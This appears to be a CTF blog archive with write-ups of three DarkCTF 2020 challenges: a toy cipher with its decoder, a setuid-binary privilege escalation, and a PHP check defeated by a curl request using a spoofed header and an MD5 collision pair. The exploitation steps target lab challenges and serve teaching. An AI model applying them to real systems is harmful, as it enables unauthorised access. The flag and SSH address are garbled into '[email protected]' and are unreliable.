
Archives of tag darkctf


DarkCTF 2020: Cryptography/WEIRD ENCRYPTION


377 points

I made this weird encryption I hope you can crack it.


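# Python 2 source as given in the challenge; flag and suffix are not defined in the part shown.
prefix="Hello. Your flag is DarkCTF{"
main_string="c an u br ea k th is we ir d en cr yp ti on".split()

clear_text = prefix + flag + suffix
enc_text = ""
for letter in clear_text:
    c1 = ord(letter) / 16   # high nibble (integer division in Python 2)
    c2 = ord(letter) % 16   # low nibble
    enc_text += main_string[c1]
    enc_text += main_string[c2]

print enc_text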




main_string = "c an u br ea k th is we ir d en cr yp ti on".split()
flag = open('Encrypted', 'r').read()

def decrypt(letter):
    # Two tokens give the high and low nibble of one character.
    return main_string.index(letter[0]) * 16 + main_string.index(letter[1])

part = ''
letter = []
decrypted = ''
for j, i in enumerate(flag):
    part += i
    # 'c' is also the first character of 'cr', so look one character ahead.
    if part in main_string and not (part == 'c' and flag[j+1:j+2] == 'r'):
        letter.append(part)
        part = ''
        if len(letter) == 2:
            decrypted += chr(decrypt(letter))
            letter = []

print(decrypted)


DarkCTF{[email protected][email protected]_M3}


DarkCTF 2020: Linux/Squids


470 points

Squids in the linux pool

Note: No automation tool required.

ssh [email protected] -p 10000 password: wolfie


Not much to comment, it took me literally a minute to find the flag.

Found a suspicious /opt dir with lots of dirs which I didn't want to check manually, so I executed find . from within /opt and found the iamroot binary, which looks like cat with root permissions (setuid). So I used the found binary to have a look into /root/flag.txt


DarkCTF 2020: Web/PHP Information


198 points

Let's test your php knowledge.

Flag Format: DarkCTF{}

Corona Web


We started with some php code:

<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Corona Web</title>

            background-color: whitesmoke

<?php

include "flag.php";

echo show_source("index.php");

// Check 1: darkctf query parameter
if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['darkctf'])){
        $darkctf = $res['darkctf'];
    }
}

if ($darkctf === "2020"){
    echo "<h1 style='color: chartreuse;'>Flag : $flag</h1></br>";
}

// Check 2: User-Agent header
if ($_SERVER["HTTP_USER_AGENT"] === base64_decode("MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==")){
    echo "<h1 style='color: chartreuse;'>Flag : $flag_1</h1></br>";
}

// Check 3: ctf2020 query parameter
if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['ctf2020'])){
        $ctf2020 = $res['ctf2020'];
    }
    if ($ctf2020 === base64_encode("ZGFya2N0Zi0yMDIwLXdlYg==")){
        echo "<h1 style='color: chartreuse;'>Flag : $flag_2</h1></br>";
    }

    // Check 4: the two inputs must differ while their MD5 digests compare equal
    if (isset($_GET['karma']) and isset($_GET['2020'])) {
        if ($_GET['karma'] != $_GET['2020'])
            if (md5($_GET['karma']) == md5($_GET['2020']))
                echo "<h1 style='color: chartreuse;'>Flag : $flag_3</h1></br>";
            else
                echo "<h1 style='color: chartreuse;'>Wrong</h1></br>";
    }
}
?>


There are a bunch of ifs that need to be defeated before getting the flag:

- darkctf parameter must be set to 2020
- User-Agent must be set to 2020_the_best_year_corona (it came from base64 decoded string MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==)
- ctf2020 parameter must be set to WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09 (it's base64 encoded (not decoded!!) string ZGFya2N0Zi0yMDIwLXdlYg==)
- and the trickiest one: the karma and 2020 parameters must not be equal, but their md5 hashes need to be the same, so we need to use strings which are affected by a hash collision

I've used the hex codes for the karma and 2020 parameters and decoded them into the right strings with xxd on the fly, because bash does not do well with nonprintable characters. The flag was conquered with the following one-liner:

curl -H "User-Agent: 2020_the_best_year_corona" -G --data-urlencode "karma=`echo "d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f8955ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5bd8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70" | xxd -p -r`" --data-urlencode "2020=`echo "d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f8955ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5bd8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70" | xxd -p -r`" "" --verbose
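The four conditions listed above can be checked offline before any request is sent. The following Python sketch is an added example, not part of the original write-up: `passed_checks` and `build_query` are hypothetical names, the model follows the conditions as the write-up lists them (not PHP's exact `parse_str` and loose-comparison semantics), and the two hex values are the ones from the one-liner.

```python
import base64
import hashlib
from urllib.parse import parse_qs, urlencode

# The two 128-byte values from the one-liner above (hex copied from the page).
KARMA = bytes.fromhex(
    "d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f89"
    "55ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5b"
    "d8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0"
    "e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70")
Y2020 = bytes.fromhex(
    "d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f89"
    "55ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5b"
    "d8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0"
    "e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70")

# Values derived from the constants in index.php.
UA_EXPECTED = base64.b64decode("MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==").decode()
CTF2020_EXPECTED = base64.b64encode(b"ZGFya2N0Zi0yMDIwLXdlYg==")  # encoded again, not decoded


def build_query():
    """Percent-encode all four parameters; the raw bytes never pass through a shell."""
    return urlencode({"darkctf": "2020", "ctf2020": CTF2020_EXPECTED,
                      "karma": KARMA, "2020": Y2020})


def passed_checks(query_string, user_agent):
    """Hypothetical offline model of the four conditions; returns the ones that hold."""
    # latin-1 maps every percent-decoded byte to one code point, so bytes round-trip.
    params = {k: v[-1].encode("latin-1")
              for k, v in parse_qs(query_string, encoding="latin-1").items()}
    md5 = lambda b: hashlib.md5(b).hexdigest()
    karma, y2020 = params.get("karma"), params.get("2020")
    checks = {
        "darkctf": params.get("darkctf") == b"2020",
        "user_agent": user_agent == UA_EXPECTED,
        "ctf2020": params.get("ctf2020") == CTF2020_EXPECTED,
        # Different inputs, identical digests: MD5 equality does not prove equal inputs.
        "md5": None not in (karma, y2020) and karma != y2020 and md5(karma) == md5(y2020),
    }
    return {name for name, ok in checks.items() if ok}


if __name__ == "__main__":
    print(sorted(passed_checks(build_query(), UA_EXPECTED)))
```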